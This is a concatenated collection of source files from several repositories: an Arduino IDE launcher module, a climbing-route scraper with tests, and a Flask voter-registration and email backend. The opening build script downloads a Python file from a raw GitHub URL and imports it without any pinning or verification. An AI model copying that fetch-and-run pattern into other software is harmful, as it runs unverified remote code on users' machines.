BINARY = "HelloWorld"
import os
if not os.path.exists("xx.py"):
print("downloading xx.py ... ", end="", flush=True)
import requests
url = "https://raw.githubusercontent.com/8bitkitkat/xx/master/xx.py"
r = requests.get(url, allow_redirects=True)
open("xx.py", "wb").write(r.content)
print("done")
import xx as x
Action = x.Action
cleanFiles = [
"build",
"*.make",
"Makefile",
]
@Action("clean")
def clean():
x.remove_paths(cleanFiles)
@Action("setup", "setup project for building")
def setup():
x.osrun("premake5 gmake2")
@Action("build|b")
def build():
setup()
x.osrun("make")
@Action("run|r")
def run():
build()
print()
x.osrun(f"./build/Debug/{BINARY}\n")
if __name__ == '__main__':
x.main()
``` |
{
"source": "8BitMixtape/NeoBlock",
"score": 2
} |
#### File: NeoBlock/ardublocklyserver/actions.py
```python
from __future__ import unicode_literals, absolute_import
import subprocess
import locale
import time
import json
import sys
import os
try:
# 2.x name
import Tkinter
import urlparse
import tkFileDialog
except ImportError:
# 3.x name
import tkinter as Tkinter
import urllib.parse as urlparse
import tkinter.filedialog as tkFileDialog
from ardublocklyserver.compilersettings import ServerCompilerSettings
from ardublocklyserver.sketchcreator import SketchCreator
import ardublocklyserver.six.six.moves as six_moves
from ardublocklyserver.six import six
import ardublocklyserver.gui as gui
#
# Sketch loading to Arduino functions
#
def load_arduino_cli(sketch_path=None):
"""
Launches a subprocess to invoke the Arduino IDE command line to open,
verify or upload an sketch, the location of which is indicated in the input
parameter.
:param sketch_path: Path to the sketch to load into the Arduino IDE.
:return: A tuple with the following data (success, conclusion, out, error,
exit_code)
"""
success = True
conclusion = error = out = exit_code = ''
# Input sanitation and output defaults
if not sketch_path:
sketch_path = create_sketch_default()
else:
if not os.path.isfile(sketch_path):
conclusion = error = 'Provided sketch path is not a valid file: %s'\
% sketch_path
success = False
return success, conclusion, out, error, exit_code
settings = ServerCompilerSettings()
# Check if CLI flags have been set
if not settings.compiler_dir:
success = False
conclusion = 'Unable to find Arduino IDE'
error = 'The compiler directory has not been set.\n' + \
'Please set it in the Settings.'
else:
if not settings.load_ide_option:
success = False
conclusion = 'What should we do with the Sketch?'
error = 'The launch IDE option has not been set.\n' + \
'Please select an IDE option in the Settings.'
elif settings.load_ide_option == 'upload':
if not settings.get_serial_port_flag():
success = False
conclusion = 'Serial Port unavailable'
error = 'The Serial Port does not exist.\n' + \
'Please check if the Arduino is correctly ' + \
'connected to the PC and select the Serial Port in ' +\
'the Settings.'
if not settings.get_arduino_board_flag():
success = False
conclusion = 'Unknown Arduino Board'
error = 'The Arduino Board has not been set.\n' + \
'Please select the appropriate Arduino Board from ' + \
'the settings.'
if success:
# Concatenates the CLI command and execute if the flags are valid
cli_command = [settings.compiler_dir]
if settings.load_ide_option == 'upload':
print('\nUploading sketch to Arduino...')
# This success conclusion message gets overwritten in case of error
conclusion = 'Successfully Uploaded Sketch'
cli_command.append('--upload')
cli_command.append('--port')
cli_command.append(settings.get_serial_port_flag())
cli_command.append('--board')
cli_command.append(settings.get_arduino_board_flag())
elif settings.load_ide_option == 'verify':
print('\nVerifying the sketch...')
# This success conclusion message gets overwritten in case of error
conclusion = 'Successfully Verified Sketch'
cli_command.append('--verify')
elif settings.load_ide_option == 'open':
print('\nOpening the sketch in the Arduino IDE...')
conclusion = 'Sketch opened in IDE'
out = 'The sketch should be loaded in the Arduino IDE.'
cli_command.append("%s" % sketch_path)
print('CLI command: %s' % ' '.join(cli_command))
# Python 2 needs the input to subprocess.Popen to be in system encoding
if sys.version_info[0] < 3:
for item in six_moves.range(len(cli_command)):
cli_command[item] = cli_command[item].encode(
locale.getpreferredencoding())
if settings.load_ide_option == 'open':
# Open IDE in a subprocess without capturing outputs
subprocess.Popen(cli_command, shell=False)
# Wait a few seconds to allow IDE to open before sending back data
time.sleep(5)
else:
# Launch the Arduino CLI in a subprocess and capture output data
process = subprocess.Popen(
cli_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=False)
out, error = process.communicate()
out = six.u(out)
error = six.u(error)
exit_code = process.returncode
print('Arduino output:\n%s' % out)
print('Arduino Error output:\n%s' % error)
print('Arduino Exit code: %s' % exit_code)
# For some reason Arduino CLI can return 256 on success
if (process.returncode != 0) and (process.returncode != 256):
success = False
if exit_code == 1:
conclusion = 'Build or Upload failed'
elif exit_code == 2:
conclusion = 'Sketch not found'
elif exit_code == 3:
conclusion = 'Invalid command line argument'
elif exit_code == 4:
conclusion =\
'Preference passed to "get-pref" flag does not exist'
else:
conclusion = 'Unexpected exit error code: %s' % exit_code
return success, conclusion, out, error, exit_code
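# Example usage (illustrative sketch: the sketch path is a placeholder, and the
# compiler directory / IDE option are assumed to be configured in the settings):
#
#   success, conclusion, out, error, exit_code = load_arduino_cli('/tmp/blink.ino')
#   print(conclusion if success else error)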
def create_sketch_default():
settings = ServerCompilerSettings()
return SketchCreator().create_sketch(
settings.sketch_dir, sketch_name=settings.sketch_name)
def create_sketch_from_string(sketch_code):
settings = ServerCompilerSettings()
return SketchCreator().create_sketch(
settings.sketch_dir, sketch_name=settings.sketch_name,
sketch_code=sketch_code)
#
# Compiler Settings
#
def set_compiler_path():
"""
Opens the file browser to select a file. Saves this file path into
ServerCompilerSettings and if the file path is different to that stored
already it triggers the new data to be saved into the settings file.
"""
new_path = gui.browse_file_dialog()
if new_path != '':
ServerCompilerSettings().compiler_dir = new_path
return get_compiler_path()
def get_compiler_path():
"""
Creates a JSON string to return to the page with the following format:
{"response_type" : "settings_compiler",
"element" : "text_input",
"display_text" : "Compiler Directory"}
"""
compiler_directory = ServerCompilerSettings().compiler_dir
if not compiler_directory:
compiler_directory = 'Please select a valid Arduino compiler directory'
json_data = {'setting_type': 'compiler',
'element': 'text_input',
'display_text': compiler_directory}
return json.dumps(json_data)
#
# Sketch settings
#
def set_sketch_path():
"""
Opens the directory browser to select a file. Saves this directory into
ServerCompilerSettings and if the directory is different to that stored
already it triggers the new data to be saved into the settings file.
"""
new_directory = gui.browse_dir_dialog()
if new_directory != '':
ServerCompilerSettings().sketch_dir = new_directory
return get_sketch_path()
def get_sketch_path():
"""
Creates a JSON string to return to the page with the following format:
{"response_type" : "settings_sketch",
"element" : "text_input",
"display_text" : "Sketch Directory"}
"""
sketch_directory = ServerCompilerSettings().sketch_dir
if not sketch_directory:
sketch_directory = 'Please select a valid Sketch directory.'
json_data = {'setting_type': 'compiler',
'element': 'text_input',
'display_text': sketch_directory}
return json.dumps(json_data)
#
# Arduino Board settings
#
def set_arduino_board(new_value):
ServerCompilerSettings().arduino_board = new_value
return get_arduino_boards()
def get_arduino_boards():
"""
Creates a JSON string to return to the page with the following format:
{"response_type" : "settings_board",
"element" : "dropdown",
"options" : [
{"value" : "XXX", "text" : "XXX"},
...]
"selected": "selected key"}
"""
json_data = \
{'setting_type': 'ide',
'element': 'dropdown',
'options': []}
#TODO: Check for None, however won't happen because static dict in settings
boards = ServerCompilerSettings().get_arduino_board_types()
for item in boards:
json_data['options'].append(
{'value': item, 'display_text': item})
json_data.update({'selected': ServerCompilerSettings().arduino_board})
return json.dumps(json_data)
#
# Serial Port settings
#
def set_serial_port(new_value):
ServerCompilerSettings().serial_port = new_value
return get_serial_ports()
def get_serial_ports():
"""
Creates a JSON string to return to the page with the following format:
{"response_type" : "settings_serial",
"element" : "dropdown",
"options" : [
{"value" : "XXX", "text" : "XXX"},
...]
"selected": "selected key"}
"""
json_data = \
{'setting_type': 'ide',
'element': 'dropdown',
'options': []}
ports = ServerCompilerSettings().get_serial_ports()
if not ports:
json_data['options'].append({
'value': 'no_ports',
'display_text': 'There are no available Serial Ports'})
json_data.update({'selected': 'no_ports'})
else:
for key in ports:
json_data['options'].append(
{'value': key, 'display_text': ports[key]})
json_data.update({'selected': ServerCompilerSettings().serial_port})
return json.dumps(json_data)
#
# Load IDE settings
#
def set_load_ide_only(new_value):
ServerCompilerSettings().load_ide_option = new_value
return get_load_ide_only()
def get_load_ide_only():
"""
Creates a JSON string to return to the page with the following format:
{"response_type" : "settings_ide",
"element" : "dropdown",
"options" : [
{"value" : "XXX", "text" : "XXX"},
...]
"selected": "selected key"}
"""
json_data = \
{'setting_type': 'ide',
'element': 'dropdown',
'options': []}
#TODO: Check for None, however won't happen because static dict in settings
ide_options = ServerCompilerSettings().get_load_ide_options()
for key in ide_options:
json_data['options'].append(
{'value': key, 'display_text': ide_options[key]})
json_data.update({'selected': ServerCompilerSettings().load_ide_option})
return json.dumps(json_data)
``` |
{
"source": "8bit-number/coursework-project",
"score": 3
} |
#### File: coursework-project/modules/main_parser.py
```python
from bs4 import BeautifulSoup
import requests
import re
import csv
from modules.exceptions import ParserException
def page_increment(num):
num += 1
return num
def url_processor(page):
"""
Function for sending requests to certain url to get the web-page contents
# >>> print(type(url_processor(1)))
# <class 'bytes'>
:param page: int - number of page in query parameter
:return: bytes - web-page contents
"""
address = "https://www.thecrag.com/climbing/world/routes"
query = dict(sortby="popularity,desc", page=page)
response = requests.get(address, params=query)
return response.content
def format_title(bs_obj):
"""
Function for getting the ascent title and its path in the readable
representation
:param bs_obj: bs4 - the table, that contains only the needed html tags
:return: list
"""
if bs_obj:
splitted = bs_obj["title"].split("›")[1:]
for el in range(len(splitted)):
splitted[el] = splitted[el].replace("\xa0", '')
splitted[el] = splitted[el].strip()
return splitted + [bs_obj.text]
else:
return None
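# Worked example (illustrative, the title below is made up): a tag whose title
# is "World › Europe › France › Fontainebleau" and whose link text is
# "La Marie Rose" becomes ['Europe', 'France', 'Fontainebleau', 'La Marie Rose'].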
def get_lat_lon(bs_obj):
"""
Function for getting latitude and longitude of each ascent and mountain
:param bs_obj: Beautiful_soup object
:return: list - list of coords
"""
full_url = "https://www.thecrag.com" + bs_obj["href"]
try:
resp = requests.get(full_url)
bs_obj = BeautifulSoup(resp.content, "lxml")
rez = bs_obj.find("dl",
{"class": "areaInfo"}).text.strip()
if "Lat/Long" not in rez:
return None
else:
            splitted = rez.split()[1:]
            return ''.join(splitted)
except:
print(full_url)
return "Unknown coords"
def get_ascent_type(bs_obj):
"""
gets the ascent style: Boulder, Mixed, Trad
it will be useful for future difficulties classification and their representation
:param bs_obj: BeautifulSoup object
:return: str
"""
rez = bs_obj.find("span", {"class": re.compile("tags .+")})
if rez:
return rez.text
return "Unknown"
def get_ascent_difficulty(bs_obj):
"""
    gets the ascent difficulty. Since some countries use their own grading
    systems, this data is important.
:param bs_obj: BeautifulSoup object
:return: str
"""
rez = bs_obj.find('span',
{"class": re.compile("pull-right gb\d+")})
category = bs_obj.find("span")["class"][1]
if rez:
return rez.text, category
return "Unknown", "Unknown"
def main_parser(html):
"""
function to process all needed data call other minor functions
:param html: html contents of the web-site
:return: None
"""
soup = BeautifulSoup(html, 'lxml')
table = soup.find_all('tr')
if len(table) == 1:
raise ParserException(
"The url contains an empty page.")
for row in table:
bs_obj = row.find("a", {"title": re.compile(".+")})
title = format_title(bs_obj)
if title:
ascent_type = get_ascent_type(row)
ascent_difficulty = get_ascent_difficulty(row)
long_lat = get_lat_lon(bs_obj)
write_to_file(title, ascent_type, ascent_difficulty[0],
ascent_difficulty[1], long_lat)
def write_to_file(title, style, difficulty, category, location):
"""
write all the data to the .csv file
:param title: list
:param style: str
:param difficulty: str
:param category: str
:param location: str
:return:
"""
with open("data.csv", "a") as csv_file:
writer = csv.writer(csv_file, delimiter=',')
if location:
writer.writerow(
title + [style] + [difficulty] + [category] + [
location])
if __name__ == '__main__':
from_page = 1
to_page = 5900
for page in range(from_page, to_page + 1):
content = url_processor(page)
try:
rows = main_parser(content)
except ParserException:
with open("log.txt", "a") as f:
f.write(content.url)
```
#### File: coursework-project/tests/csv_to_db_test.py
```python
import unittest
from modules.csv_to_db import DataBase
class MyTestCase(unittest.TestCase):
def setUp(self):
self.db = DataBase("../data/first9000.db")
self.austria = self.db.execute_selection_by_country("Austria")
self.france = self.db.execute_selection_by_country("France")
def test_locations_table(self):
location_1 = "Europe, Austria, Ost, Industrieviertel, Wienerwald(IV), Thalhofergrat, ObereOstwand, ★★ Osterhasi"
location_2 = "Europe, France, Île-de-France, Fontainebleau, Cuvier, BasCuvier, RedcircuitTD+(nº6), ★★★ La Marie Rose"
self.assertEqual(self.austria[0].location, location_1)
self.assertEqual(self.france[0].location, location_2)
def test_difficulty(self):
category_1 = "Intermediate"
category_2 = "Experienced"
self.assertEqual(self.austria[0].category, category_1)
self.assertEqual(self.france[0].category, category_2)
def test_style(self):
style_1 = "Sport"
style_2 = "Boulder"
self.assertEqual(self.austria[0].style, style_1)
self.assertEqual(self.france[0].style, style_2)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "8BookIt8/Genetic-Algorithm",
"score": 3
} |
#### File: 8BookIt8/Genetic-Algorithm/BIfood.py
```python
import pygame
import yaml
import math
from random import randrange
with open('settings.yaml') as file:
settings = yaml.load(file, yaml.FullLoader)
center = (451, 451)
spawn_distance = settings['basic_settings']['max_distance_food']
class BIFood(pygame.sprite.Sprite):
    # Basic setup
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("images/food.png").convert_alpha()
self.x = center[0]
self.y = center[1]
self.rect = self.image.get_rect()
self.rect.left = 0
self.rect.top = 0
self.size = 5
self.init()
    # Calculate the distance from the center
def distanceFromCenter(self, pos):
'''
        Calculate the distance from the center of the field.
        Args:
            pos (tuple): target coordinates
        Returns:
            dist (float): distance from the center of the field to pos
'''
dist = ((center[0] - pos[0]) ** 2) + ((center[1] - pos[1]) ** 2)
dist = math.sqrt(dist)
return dist
    # Set the collision rect
def setRect(self):
'''
        Set the rect from the current position
'''
self.rect.left = self.x - 5
self.rect.top = self.y - 5
    # Set the spawn position
def init(self):
'''
        Set the entity's spawn position
'''
while True:
x = randrange(spawn_distance * -1, spawn_distance + 1)
y = randrange(spawn_distance * -1, spawn_distance + 1)
if (self.distanceFromCenter((self.x + x, self.y + y)) <= spawn_distance):
self.x += x
self.y += y
self.setRect()
break
``` |
{
"source": "8by8-org/usvotes",
"score": 2
} |
#### File: app/main/starter_views.py
```python
from __future__ import print_function
from app.main import main
from flask import g, url_for, render_template, request, redirect, session as http_session, abort, current_app, flash, jsonify, make_response
from app.main.forms import *
from app.services import SessionManager
from app.services.steps import Step_0
from app.main.helpers import guess_locale
import json
from app.services import FormFillerService
from app.services.usps_api import USPS_API
from app.services.email_service import EmailService
from flask_cors import cross_origin
from datetime import datetime, timedelta
from apscheduler.schedulers.background import BackgroundScheduler
#from google.cloud import scheduler_v1
import os
import tracemalloc
tracemalloc.start(10)
# backend api endpoint for checking voter registration status
@main.route('/registered', strict_slashes=False, methods=["POST"])
@cross_origin(origin='*')
def registered():
# accept JSON data, default to Form data if no JSON in request
if request.json:
requestData = request.json
else:
requestData = request.form
# do error checking
missingParams = []
otherErrors = []
if 'state' not in requestData:
missingParams.append('state')
elif len(requestData.get('state')) != 2:
otherErrors.append('state must be 2 letter abbreviation')
if 'city' not in requestData:
missingParams.append('city')
if 'street' not in requestData:
missingParams.append('street')
if 'name_first' not in requestData:
missingParams.append('name_first')
if 'name_last' not in requestData:
missingParams.append('name_last')
if 'dob' not in requestData:
missingParams.append('dob')
else:
dob = requestData.get('dob').split('/')
if len(dob) != 3 or len(dob[0]) not in range(1, 3) or len(dob[1]) not in range(1, 3) or len(dob[2]) != 4:
otherErrors.append('dob must be in the form mm/dd/yyyy')
if 'zip' not in requestData:
missingParams.append('zip')
elif len(requestData.get('zip')) != 5:
otherErrors.append('zip must be 5 digits')
if missingParams:
error = 'Missing parameters: '
error += missingParams[0]
for i in range(1, len(missingParams)):
error = error + ', ' + missingParams[i]
resp = jsonify(error=error)
return make_response(resp, 400)
# check if address is valid
form = FormVR3(
addr = requestData.get('street'),
city = requestData.get('city'),
state = requestData.get('state'),
zip = requestData.get('zip'),
)
usps_api = USPS_API(form.data)
validated_addresses = usps_api.validate_addresses()
if not validated_addresses:
otherErrors.append('(street, city, state, zip) do not form a valid address')
if otherErrors:
error = otherErrors[0]
for i in range(1, len(otherErrors)):
error = error + ', ' + otherErrors[i]
resp = jsonify(error=error)
return make_response(resp, 400)
    # look up the voter registration record
someJson = requestData
step = Step_0(someJson)
regFound = step.lookup_registration(
state=requestData.get('state'),
city=requestData.get('city'),
street=requestData.get('street'),
name_first=requestData.get('name_first'),
name_last=requestData.get('name_last'),
dob=requestData.get('dob'),
zipcode=requestData.get('zip')
)
#print(regFound)
if (regFound and 'status' not in regFound) or (regFound and 'status' in regFound and regFound['status'] == 'active'):
return jsonify({ 'registered': True })
elif regFound and 'status' in regFound:
return { 'registered': False, 'status': regFound['status'] }
else:
return { 'registered': False, 'status': 'not found' }
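# Example request (illustrative sketch: the host/port and all field values are
# placeholders, assuming the Flask app is served locally):
#
#   import requests
#   resp = requests.post('http://localhost:5000/registered', json={
#       'state': 'KS', 'city': 'Wichita', 'street': '123 Main St',
#       'name_first': 'Jane', 'name_last': 'Doe',
#       'dob': '01/02/1990', 'zip': '67202'})
#   print(resp.json())   # e.g. {'registered': True}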
# backend api endpoint for filling out the Federal Form to register to vote
@main.route('/registertovote', strict_slashes=False, methods=['POST'])
@cross_origin(origin='*')
def reg():
# accept JSON data, default to Form data if no JSON in request
if request.json:
requestData = request.json
else:
requestData = request.form
# do error checking
missingParams = []
otherErrors = []
if 'name_first' not in requestData:
missingParams.append('name_first')
if 'name_last' not in requestData:
missingParams.append('name_last')
if 'state' not in requestData:
missingParams.append('state')
elif len(requestData.get('state')) != 2:
otherErrors.append('state must be 2 letter abbreviation')
if 'city' not in requestData:
missingParams.append('city')
if 'street' not in requestData:
missingParams.append('street')
if 'dob' not in requestData:
missingParams.append('dob')
else:
dobArr = requestData.get('dob').split('/')
if len(dobArr) != 3 or len(dobArr[0]) not in range(1, 3) or len(dobArr[1]) not in range(1, 3) or len(dobArr[2]) != 4:
otherErrors.append('dob must be in the form mm/dd/yyyy')
if 'zip' not in requestData:
missingParams.append('zip')
elif len(requestData.get('zip')) != 5:
otherErrors.append('zip must be 5 digits')
if 'email' not in requestData:
missingParams.append('email')
else:
emailArr = requestData.get('email').split('@')
if len(emailArr) != 2 or len(list(filter(None, emailArr[1].split('.')))) != 2:
otherErrors.append('invalid email')
if 'citizen' not in requestData:
missingParams.append('citizen')
elif requestData.get('citizen') != 'yes':
otherErrors.append('citizen parameter must be yes')
if 'eighteenPlus' not in requestData:
missingParams.append('eighteenPlus')
elif requestData.get('eighteenPlus') != 'yes':
otherErrors.append('eighteenPlus parameter must be yes')
if 'party' not in requestData:
missingParams.append('party')
if 'idNumber' not in requestData:
missingParams.append('idNumber')
elif not requestData.get('idNumber').isdigit():
otherErrors.append('invalid ID number')
if missingParams:
error = 'Missing parameters: '
error += missingParams[0]
for i in range(1, len(missingParams)):
error = error + ', ' + missingParams[i]
resp = jsonify(error=error)
return make_response(resp, 400)
# check if the address is valid (via USPS address verification)
# instead of an error, send a warning if address is invalid right after email is sent
form = FormVR3(
addr = requestData.get('street'),
city = requestData.get('city'),
state = requestData.get('state'),
zip = requestData.get('zip'),
)
usps_api = USPS_API(form.data)
validated_addresses = usps_api.validate_addresses()
if otherErrors:
error = otherErrors[0]
for i in range(1, len(otherErrors)):
error = error + ', ' + otherErrors[i]
resp = jsonify(error=error)
return make_response(resp, 400)
# get POST form body parameters
name_first = requestData.get('name_first')
name_last = requestData.get('name_last')
state = requestData.get('state')
city = requestData.get('city')
street = requestData.get('street')
dob = requestData.get('dob')
zip = requestData.get('zip')
email = requestData.get('email')
party = requestData.get('party')
idNumber = requestData.get('idNumber')
payload_file = 'app/services/tests/test-vr-en-payload.json'
with open(payload_file) as payload_f:
payload = json.load(payload_f)
payload['01_firstName'] = name_first
payload['01_lastName'] = name_last
payload['02_homeAddress'] = street
payload['02_aptLot'] = ""
payload['02_cityTown'] = city
payload['02_state'] = state
payload['02_zipCode'] = zip
payload['04_dob'] = dob
payload['07_party'] = party
payload['06_idNumber'] = idNumber
payload['00_citizen_yes'] = True
payload['00_eighteenPlus_yes'] = True
# fill out the voter registration form
ffs = FormFillerService(payload=payload, form_name='/vr/en')
img = ffs.as_image()
# use Gmail API to send email to the user with their voter reg form
emailServ = EmailService()
to = email
subject = 'Here’s your voter registration form'
messageWithAttachment = emailServ.create_message_with_attachment(to, subject, img)
emailServ.send_message(messageWithAttachment)
if not validated_addresses:
return { 'status': 'email sent', 'warning': '(street, city, state, zip) do not form a valid address' }
return { 'status': 'email sent' }
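# Example request (illustrative sketch: host/port and field values are
# placeholders, assuming the Flask app is served locally):
#
#   import requests
#   resp = requests.post('http://localhost:5000/registertovote', json={
#       'name_first': 'Jane', 'name_last': 'Doe', 'street': '123 Main St',
#       'city': 'Wichita', 'state': 'KS', 'zip': '67202', 'dob': '01/02/1990',
#       'email': 'jane@example.com', 'citizen': 'yes', 'eighteenPlus': 'yes',
#       'party': 'Unaffiliated', 'idNumber': '123456'})
#   print(resp.json())   # {'status': 'email sent'}, possibly with a warning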
@main.route('/email', strict_slashes=False, methods=['POST'])
@cross_origin(origin='*')
def email():
# accept JSON data, default to Form data if no JSON in request
if request.json:
requestData = request.json
else:
requestData = request.form
# do error checking
missingParams = []
if 'email' not in requestData:
missingParams.append('email')
else:
emailArr = requestData.get('email').split('@')
if len(emailArr) != 2 or len(list(filter(None, emailArr[1].split('.')))) != 2:
resp = jsonify(error='invalid email: ' + requestData.get('email'))
return make_response(resp, 400)
if 'type' not in requestData:
missingParams.append('type')
elif requestData.get('type') == 'badgeEarned':
if 'avatar' not in requestData or 'daysLeft' not in requestData or 'badgesLeft' not in requestData:
resp = jsonify(error='for badgeEarned emails, parameters avatar, daysLeft, and badgesLeft are required')
return make_response(resp, 400)
elif (requestData.get('type') == 'registered' or requestData.get('type') == 'electionReminder') and ('avatar' not in requestData or 'firstName' not in requestData):
resp = jsonify(error='for ' + requestData.get('type') + ' emails, parameters avatar and firstName are required')
return make_response(resp, 400)
elif requestData.get('type') == 'challengeWon' and 'avatar' not in requestData:
resp = jsonify(error='for ' + requestData.get('type') + ' emails, parameter avatar is required')
return make_response(resp, 400)
if missingParams:
error = 'Missing parameters: '
error += missingParams[0]
for i in range(1, len(missingParams)):
error = error + ', ' + missingParams[i]
resp = jsonify(error=error)
return make_response(resp, 400)
# Initialize email service that uses Gmail API
emailServ = EmailService()
emailTo = requestData.get('email')
type = requestData.get('type')
daysLeft = requestData.get('daysLeft')
badgesLeft = requestData.get('badgesLeft')
firstName = requestData.get('firstName')
avatar = requestData.get('avatar')
isChallenger = requestData.get('isChallenger')
# Attempt to create the email template that was asked for
try:
message = emailServ.create_template_message(emailTo, type, daysLeft, badgesLeft, firstName, avatar, isChallenger)
emailServ.send_message(message)
if type == 'challengerWelcome':
# Start the scheduler
#sched = BackgroundScheduler()
#sched.start()
currDay = datetime.today()
#challengeEnd = currDay + timedelta(days=8)
# Store the job in a variable in case we want to cancel it.
# The job will be executed on the day the challenge ends
#job = sched.add_job(delay_send, 'date', run_date=challengeEnd, args=[emailTo])
return { 'status': 'email sent' }
except ValueError: # value error if email type provided by user is not valid
resp = jsonify(error='invalid template type, valid types include: challengerWelcome, badgeEarned, challengeWon, challengeIncomplete, playerWelcome, registered, electionReminder')
return make_response(resp, 400)
except Exception as e:
resp = jsonify(error='invalid email: ' + emailTo)
return make_response(resp, 400)
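# Example request (illustrative sketch: host/port and values are placeholders,
# assuming the Flask app is served locally):
#
#   import requests
#   resp = requests.post('http://localhost:5000/email', json={
#       'email': 'player@example.com', 'type': 'badgeEarned',
#       'avatar': '2', 'daysLeft': '3', 'badgesLeft': '4'})
#   print(resp.json())   # {'status': 'email sent'} on success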
def delay_send(emailTo):
# Initialize email service that uses Gmail API
emailServ = EmailService()
message = emailServ.create_template_message(emailTo, 'challengeIncomplete')
emailServ.send_message(message)
return 'delayed email sent'
'''
def create_scheduled_job():
client = scheduler_v1.CloudSchedulerClient.from_service_account_info({
"type": "service_account",
"project_id": os.getenv('PROJECT_ID'),
"private_key_id": os.getenv('PRIVATE_KEY_ID'),
"private_key": os.getenv('PRIVATE_KEY'),
"client_email": os.getenv('CLIENT_EMAIL'),
"client_id": os.getenv('CLIENT_ID_GCS'),
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://oauth2.googleapis.com/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/emailscheduler%40by8-318322.iam.gserviceaccount.com"
}
)
parent= client.location_path(os.getenv('PROJECT_ID'),'us-west1')
job={"name":"projects/your-project/locations/app-engine-location/jobs/traing_for_model",
"description":"this is for testing training model",
"http_target": {"uri":"https://us-central1-gerald-automl-test.cloudfunctions.net/automl-trainmodel-1-test-for-cron-job"},
"schedule":"0 10 * * *",
"time_zone":"America/Los_Angeles",
}
job = {
"name": "",
"http_target": {
"http_method": "POST",
"uri": uri,
"headers": {"Content-Type": "application/json"},
"body": {'email': '<EMAIL>',
'type': 'challengeIncomplete',
'avatar': '2',
'daysLeft': '3',
'badgesLeft': '4',
'firstName': 'Wesley'},
},
"schedule": "* * * * *",
"time_zone":"America/Los_Angeles",
}
# https://googleapis.dev/python/cloudscheduler/latest/scheduler_v1/cloud_scheduler.html
# use update_job to update the schedule of the job to sent emails
response = client.create_job(parent, job)
training_job= client.create_job(parent,job)
'''
''' Old endpoints from KSVotes '''
# default route
@main.route('/', methods=["GET"])
def index():
g.locale = guess_locale()
return render_template('about.html')
@main.route('/privacy-policy', methods=['GET'])
def privacy():
g.locale = guess_locale()
return render_template('privacy-policy.html')
@main.route('/about', methods=['GET'])
def about_us():
g.locale = guess_locale()
return render_template('about.html')
# endpoint to check in on the status of the application
@main.route('/memory/', methods=['GET'])
def memory():
import tracemalloc
import linecache
import os
key_type = 'lineno'
limit = 20
snapshot = tracemalloc.take_snapshot()
snapshot = snapshot.filter_traces((
tracemalloc.Filter(False, "<frozen importlib._bootstrap>"),
tracemalloc.Filter(False, "<frozen importlib._bootstrap_external>"),
tracemalloc.Filter(False, "<unknown>"),
))
top_stats = snapshot.statistics(key_type)
buff = []
buff.append("Top %s lines" % limit)
for index, stat in enumerate(top_stats[:limit], 1):
frame = stat.traceback[0]
buff.append("#%s: %s:%s: %.1f KiB"
% (index, frame.filename, frame.lineno, stat.size / 1024))
line = linecache.getline(frame.filename, frame.lineno).strip()
if line:
buff.append(' %s' % line)
other = top_stats[limit:]
if other:
size = sum(stat.size for stat in other)
buff.append("%s other: %.1f KiB" % (len(other), size / 1024))
total = sum(stat.size for stat in top_stats)
buff.append("Total allocated size: %.1f KiB" % (total / 1024))
return jsonify(status='ok', total=total, report=buff, pid=os.getpid())
```
#### File: app/services/ses_mailer.py
```python
import boto3
import botocore
import newrelic.agent
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from flask import current_app
import os
# used for emailing to states
class SESMailer():
def to_html(self, txt):
html = '<html><body><p>' + txt.replace("\n", '</p><p>') + '</p></body></html>'
return html
def build_msg(self, **kwargs):
recip_to = kwargs['to'] if 'to' in kwargs else None
if not recip_to:
            raise ValueError('to required')
recip_cc = kwargs['cc'] if 'cc' in kwargs else []
recip_bcc = kwargs['bcc'] if 'bcc' in kwargs else []
subject = kwargs['subject'] if 'subject' in kwargs else 'no subject'
body = kwargs['body'] if 'body' in kwargs else 'this space left blank'
attachments = kwargs['attach'] if 'attach' in kwargs else []
msg = MIMEMultipart()
msg['Subject'] = str(subject)
msg['To'] = ', '.join(recip_to)
msg['Cc'] = ', '.join(recip_cc)
msg['Bcc'] = ', '.join(recip_bcc)
msg['X-KSV-Sent-From'] = os.getenv('NEW_RELIC_APP_NAME', default='ksvotes-dev')
# order of mime parts is important, as last is preferred in client view.
readable_msg = MIMEMultipart('alternative')
readable_msg.attach(MIMEText(body, 'plain' , 'utf-8'))
readable_msg.attach(MIMEText(self.to_html(body), 'html', 'utf-8'))
msg.attach(readable_msg)
for attachment in attachments:
file_name = attachment['name']
mime_part = MIMEApplication(attachment['img'])
mime_part.add_header('Content-Disposition', 'attachment', filename=file_name)
mime_part.add_header('Content-Type', 'image/png; name="{}"'.format(file_name))
msg.attach(mime_part)
return msg
def send_msg(self, msg, sender):
msg['From'] = sender
# no email sent unless explicitly configured.
if not current_app.config['SEND_EMAIL']:
return {'msg': msg, 'MessageId': 'set SEND_EMAIL env var to enable email'}
try:
if 'To' not in msg or not msg['To']:
raise RuntimeError("Missing To in %s" %(msg.as_string()))
# test our error handling
if msg['To'] == current_app.config['FAIL_EMAIL']:
raise RuntimeError('Failure testing works')
ses = boto3.client('ses',
region_name=current_app.config['AWS_DEFAULT_REGION'],
aws_access_key_id=current_app.config['SES_ACCESS_KEY_ID'],
aws_secret_access_key=current_app.config['SES_SECRET_ACCESS_KEY']
)
resp = ses.send_raw_email(
RawMessage={'Data': msg.as_string()},
Source=sender,
)
return resp
except botocore.exceptions.ClientError as err:
current_app.logger.error(str(err))
newrelic.agent.record_exception()
return {'msg': msg, 'MessageId': False, 'error': err}
except (RuntimeError, TypeError, NameError) as err:
current_app.logger.error(str(err))
newrelic.agent.record_exception()
return {'msg': msg, 'MessageId': False, 'error': err}
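# Example usage (illustrative sketch: recipient, subject and sender are
# placeholders, and it assumes an active Flask application context so that
# current_app.config is available):
#
#   mailer = SESMailer()
#   msg = mailer.build_msg(to=['clerk@example.com'], subject='VR forms',
#                          body='Completed forms attached.', attach=[])
#   mailer.send_msg(msg, 'noreply@example.com')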
```
#### File: app/services/session_manager.py
```python
from app.services.steps import *
from flask import g, current_app
class SessionManager():
"""
Session manager is responsible for taking in a registrant and current step and then determining which step needs to be performed next.
"""
# initialize these as None, override them with init method if valid.
next_step = None
prev_step = None
def __init__(self, registrant, current_step):
self.registrant = registrant
self.current_step = current_step
self._init_next_step()
self._init_prev_step()
